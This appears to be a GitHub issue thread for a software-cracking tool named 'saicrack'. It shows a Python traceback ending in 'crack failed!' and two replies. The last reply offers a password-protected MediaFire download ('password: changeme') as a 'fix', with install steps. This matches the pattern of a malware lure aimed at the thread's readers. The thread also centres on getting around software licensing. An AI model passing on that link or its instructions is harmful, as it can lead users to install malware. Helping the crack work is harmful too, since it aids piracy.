### ISSUE TITLE
crack failed! in the 2024 may version, error 234

### ISSUE THREAD

**Issue by Meowawwww** [tututu-patch/saicrack#7]
sai cracker ver 1.0.0

[Error 234] : './*.*'
Traceback (most recent call last):
  File "<string>", line 162, in <module>
  File "<string>", line 91, in docrack
WindowsError: [Error 234] : './*.*'
crack failed!
Press ENTER key to continue...

**Comment by Meowawwww** [comment]
i fixed it. Download the software again and use it in the new software. remember change the file address unless the problem won't fix.

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
